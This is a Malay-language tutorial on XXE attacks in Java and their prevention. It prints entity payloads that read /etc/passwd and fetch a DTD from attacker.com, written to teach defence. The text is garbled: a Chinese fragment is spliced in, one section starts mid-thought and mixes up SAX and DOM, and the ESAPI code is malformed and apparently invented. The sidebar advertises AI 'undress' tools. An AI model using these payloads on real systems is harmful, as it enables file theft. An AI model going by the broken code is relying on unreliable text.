Serangan dan pencegahan entiti luaran XML dalam Java
Serangan dan Pencegahan Entiti Luar XML di Java
Pengenalan:
XML (Bahasa Penanda Boleh Diperluas) digunakan secara meluas dalam banyak aplikasi dan ia merupakan format universal untuk menyimpan dan menghantar data. Walau bagaimanapun, disebabkan oleh kelemahan keselamatan dalam pemprosesan XML, seperti serangan Entiti Luar XML (Entiti Luar XML, XXE), aplikasi terdedah kepada serangan, jadi kami perlu mencegah dan melindungi daripada serangan XXE. Artikel ini akan memperkenalkan prinsip serangan XXE, teknik serangan biasa dan menyediakan beberapa langkah pencegahan dan contoh kod biasa.
1. Apakah serangan entiti luaran XML?
Serangan entiti luaran XML merujuk kepada penyerang yang mengeksploitasi kelemahan dalam pemproses XML untuk memperkenalkan entiti luaran dan membaca fail sensitif atau melakukan operasi berniat jahat. Entiti luaran XML ialah mekanisme khas untuk merujuk dokumen atau sumber luaran Dalam keadaan biasa, ia boleh membantu aplikasi mendapatkan beberapa data yang berguna. Walau bagaimanapun, penyerang boleh membina entiti berniat jahat untuk membaca fail tempatan, fail jauh dan juga melaksanakan arahan.
2. Teknik serangan biasa
-
serangan pernyataan DOCTYPE
Penyerang boleh mencetuskan serangan XXE dengan membina pernyataan DOCTYPE yang berniat jahat. Contohnya:<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
Salin selepas log masukDalam kod di atas, penyerang menggunakan fail XML yang diisytiharkan oleh
DOCTYPE声明定义了一个实体xxe,它引用了/etc/passwd文件,攻击者可以通过解析含有这个DOCTYPEdan berjaya membaca fail sensitif itu. Serangan Entiti URL
Penyerang boleh mencetuskan serangan XXE dengan membina entiti URL. Contohnya:<!ENTITY xxe SYSTEM "http://attacker.com/malicious.dtd">
Salin selepas log masukDalam kod di atas, penyerang meletakkan fail DTD berniat jahat pada pelayan jauh dan membaca serta melaksanakan fail dengan merujuk URL.
3 Penghurai DOM, yang mempunyai penggunaan memori yang lebih rendah dan tidak menyokong sambungan entiti, dengan itu mengelakkan risiko serangan XXE. Berikut ialah kod sampel untuk menghuraikan XML menggunakan penghurai SAX:
SAXParserFactory factory = SAXParserFactory.newInstance();
SAXParser saxParser = factory.newSAXParser();
XMLHandler handler = new XMLHandler();
saxParser.parse(new File("example.xml"), handler);- Lumpuhkan penghuraian entiti luaran
Kami boleh melumpuhkan penghuraian entiti luaran semasa proses penghuraian XML, dengan itu menghalang serangan XXE. Berikut ialah kod contoh untuk melumpuhkan penghuraian entiti luaran menggunakan penghurai DOM:
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); DocumentBuilder builder = factory.newDocumentBuilder(); Document document = builder.parse(new File("example.xml"));Salin selepas log masuk - Gunakan penghurai XML yang selamat
Menggunakan penghurai XML yang selamat boleh memberikan keupayaan pertahanan yang lebih kukuh, seperti yang disediakan dalam OWASP ESAPI untuk pertahanan terhadap XXE Attack-safe Penghurai XML. Berikut ialah contoh kod untuk menghuraikan XML menggunakan OWASP ESAPI:
String xmlContent = "<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>"; String safeContent = ESAPI.encoder().canonicalize(xmlContent); SAXParserFactory factory = SAXParserFactory.newInstance(); SAXParser parser = ESAPI.securityConfiguration().getSAXFactory().newSAXParser(); parser.parse(new InputSource(new StringReader(safeContent)), new DefaultHandler());
Salin selepas log masuk - Kesimpulan:
Serangan entiti luaran XML ialah kelemahan keselamatan biasa yang boleh membaca maklumat sensitif atau melakukan operasi berniat jahat dengan membina fail XML berniat jahat. Untuk melindungi aplikasi daripada serangan XXE, kami boleh mengambil satu siri langkah pertahanan, seperti menggunakan penghurai SAX, melumpuhkan penghuraian entiti luaran dan menggunakan penghurai XML yang selamat. Dengan langkah berjaga-jaga ini, kami boleh meningkatkan keselamatan aplikasi kami dan mengurangkan risiko serangan XXE.
Atas ialah kandungan terperinci Serangan dan pencegahan entiti luaran XML dalam Java. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!
Alat AI Hot
Undresser.AI Undress
Apl berkuasa AI untuk mencipta foto bogel yang realistik
AI Clothes Remover
Alat AI dalam talian untuk mengeluarkan pakaian daripada foto.
Undress AI Tool
Gambar buka pakaian secara percuma
Clothoff.io
Penyingkiran pakaian AI
AI Hentai Generator
Menjana ai hentai secara percuma.
Artikel Panas
Alat panas
Notepad++7.3.1
Editor kod yang mudah digunakan dan percuma
SublimeText3 versi Cina
Versi Cina, sangat mudah digunakan
Hantar Studio 13.0.1
Persekitaran pembangunan bersepadu PHP yang berkuasa
Dreamweaver CS6
Alat pembangunan web visual
SublimeText3 versi Mac
Perisian penyuntingan kod peringkat Tuhan (SublimeText3)
Topik panas
1386
52
Bolehkah saya membuka fail XML menggunakan PowerPoint?
Feb 19, 2024 pm 09:06 PM
Bolehkah fail XML dibuka dengan PPT? XML, Extensible Markup Language (Extensible Markup Language), ialah bahasa markup universal yang digunakan secara meluas dalam pertukaran data dan penyimpanan data. Berbanding dengan HTML, XML lebih fleksibel dan boleh menentukan tag dan struktur datanya sendiri, menjadikan penyimpanan dan pertukaran data lebih mudah dan bersatu. PPT, atau PowerPoint, ialah perisian yang dibangunkan oleh Microsoft untuk membuat pembentangan. Ia menyediakan cara yang komprehensif untuk
Menggunakan Python untuk menggabungkan dan menyahduplikasi data XML
Aug 07, 2023 am 11:33 AM
Menggunakan Python untuk menggabungkan dan menyahduplikasi data XML XML (eXtensibleMarkupLanguage) ialah bahasa penanda yang digunakan untuk menyimpan dan menghantar data. Apabila memproses data XML, kadangkala kita perlu menggabungkan berbilang fail XML menjadi satu, atau mengalih keluar data pendua. Artikel ini akan memperkenalkan cara menggunakan Python untuk melaksanakan penggabungan dan penyahduplikasian data XML, dan memberikan contoh kod yang sepadan. 1. Penggabungan data XML Apabila kita mempunyai berbilang fail XML, kita perlu menggabungkannya
Tukar data XML kepada format CSV dalam Python
Aug 11, 2023 pm 07:41 PM
Tukar data XML dalam Python kepada format CSV XML (ExtensibleMarkupLanguage) ialah bahasa penanda boleh diperluas yang biasa digunakan untuk penyimpanan dan penghantaran data. CSV (CommaSeparatedValues) ialah format fail teks dipisahkan koma yang biasa digunakan untuk import dan eksport data. Semasa memproses data, kadangkala data XML perlu ditukar kepada format CSV untuk analisis dan pemprosesan yang mudah. Python adalah yang kuat
Menapis dan menyusun data XML menggunakan Python
Aug 07, 2023 pm 04:17 PM
Melaksanakan penapisan dan pengisihan data XML menggunakan Python Pengenalan: XML ialah format pertukaran data yang biasa digunakan yang menyimpan data dalam bentuk teg dan atribut. Apabila memproses data XML, kami selalunya perlu menapis dan mengisih data. Python menyediakan banyak alat dan perpustakaan yang berguna untuk memproses data XML. Artikel ini akan memperkenalkan cara menggunakan Python untuk menapis dan mengisih data XML. Membaca fail XML Sebelum kita mula, kita perlu membaca fail XML. Python mempunyai banyak perpustakaan pemprosesan XML,
Import data XML ke dalam pangkalan data menggunakan PHP
Aug 07, 2023 am 09:58 AM
Mengimport data XML ke dalam pangkalan data menggunakan PHP Pengenalan: Semasa pembangunan, kita sering perlu mengimport data luaran ke dalam pangkalan data untuk pemprosesan dan analisis selanjutnya. Sebagai format pertukaran data yang biasa digunakan, XML sering digunakan untuk menyimpan dan menghantar data berstruktur. Artikel ini akan memperkenalkan cara menggunakan PHP untuk mengimport data XML ke dalam pangkalan data. Langkah 1: Menghuraikan fail XML Mula-mula, kita perlu menghuraikan fail XML dan mengekstrak data yang diperlukan. PHP menyediakan beberapa cara untuk menghuraikan XML, yang paling biasa digunakan ialah menggunakan Mudah
Python melaksanakan penukaran antara XML dan JSON
Aug 07, 2023 pm 07:10 PM
Python melaksanakan penukaran antara XML dan JSON Pengenalan: Dalam proses pembangunan harian, kita selalunya perlu menukar data antara format yang berbeza. XML dan JSON ialah format pertukaran data biasa Dalam Python, kita boleh menggunakan pelbagai perpustakaan untuk menukar antara XML dan JSON. Artikel ini akan memperkenalkan beberapa kaedah yang biasa digunakan, dengan contoh kod. 1. Untuk menukar XML kepada JSON dalam Python, kita boleh menggunakan modul xml.etree.ElementTree
Mengendalikan ralat dan pengecualian dalam XML menggunakan Python
Aug 08, 2023 pm 12:25 PM
Mengendalikan Ralat dan Pengecualian dalam XML Menggunakan Python XML ialah format data yang biasa digunakan untuk menyimpan dan mewakili data berstruktur. Apabila kami menggunakan Python untuk memproses XML, kadangkala kami mungkin menghadapi beberapa ralat dan pengecualian. Dalam artikel ini, saya akan memperkenalkan cara menggunakan Python untuk mengendalikan ralat dan pengecualian dalam XML, dan menyediakan beberapa kod sampel untuk rujukan. Gunakan pernyataan cuba-kecuali untuk menangkap ralat penghuraian XML Apabila kami menggunakan Python untuk menghuraikan XML, kadangkala kami mungkin menghadapi beberapa
Python menghuraikan aksara khas dan urutan melarikan diri dalam XML
Aug 08, 2023 pm 12:46 PM
Python menghuraikan aksara khas dan jujukan melarikan diri dalam XML XML (eXtensibleMarkupLanguage) ialah format pertukaran data yang biasa digunakan untuk memindahkan dan menyimpan data antara sistem yang berbeza. Semasa memproses fail XML, anda sering menghadapi situasi yang mengandungi aksara khas dan urutan melarikan diri, yang boleh menyebabkan ralat penghuraian atau salah tafsiran data. Oleh itu, apabila menghuraikan fail XML menggunakan Python, kita perlu memahami cara mengendalikan aksara khas dan urutan melarikan diri ini. 1. Watak istimewa dan
